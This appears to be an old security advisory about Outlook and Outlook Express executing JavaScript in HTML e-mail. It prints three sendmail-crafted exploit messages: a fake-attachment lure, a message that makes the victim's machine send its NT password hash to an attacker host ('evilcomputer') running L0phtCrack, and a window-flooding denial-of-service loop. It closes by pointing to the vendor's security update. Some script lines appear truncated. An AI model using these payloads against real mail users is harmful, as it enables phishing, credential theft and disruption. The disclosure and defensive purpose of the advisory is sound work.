Microsoft Outlook
cassius found following. Outlook HTML messages with embedded
JavaScript calls can automatically open malicious
URLs. An attacker could use this vulnerability to make it appear
that the user has received an attachment that has passed all SMTP
scanners. The risk here is high, as this vulnerability could
allow another 'ILoveYou' type virus to propagate with minimal
This vulnerability also opens Outlook and possibly other
HTML/JavaScript enabled E-mail clients to a variety of other
malicious URL attacks. Examples of possible attacks seem to be
endless. He has been able to send messages that, when opened,
automatically send a NT users password hash to a box running
L0phtCrack in SMB packet capture mode. This is a variation on a
known attack that relies on social engineering to get the victim
to click on a link within the message.
He has tested the following exploits against Outlook 2000 and
Outlook Express. Suppose all versions that allow HTML messages
with embedded JavaScript are vulnerable. Outlook 2000 is not
vulnerable when the message is viewed in the preview pane or if
the Outlook Security Update has been installed.
The following examples use Sendmail to craft the messages.
Outlook does not normally give you enough control of HTML message
source to send these messages.
Example 1 - Sending Fake Attachments
% sendmail
MIME-Version: 1.0
Content-Type: text/html
Subject: I love you not.
<html><script language="JavaScript"><!--'');
--></script>I have attached a file for you.</html>
When the victim opens the message an IE dialog box is displayed
that prompts the user to open the file or download it. An
unsuspecting user could be tricked into thinking that this
'attachment' has passed all SMTP security scans.
Example 2 - Requesting NT Password Hashes
Set up L0phtCrack to sniff SMB packets on evilcomputer. Then send
the following message.
% sendmail
MIME-Version: 1.0
Content-Type: text/html
Subject: Give me your hash.
<html><script language="JavaScript"><!--'file:////evilcomputer/sharename/thankyou.html');
--></script>Blah blah blah.</html>
Example 3 - Annoying DoS Attack
% sendmail
MIME-Version: 1.0
Content-Type: text/html
Subject: b00m!
<html><script language="JavaScript"><!--
for (loop=0; loop < 1000; loop++) {'about:<b><h1>Die!'); }
The solution for Outlook 98/2000 users is to install the Outlook
E-mail Security Update. Outlook Express users should upgrade to
Outlook 2000 or some other mail client.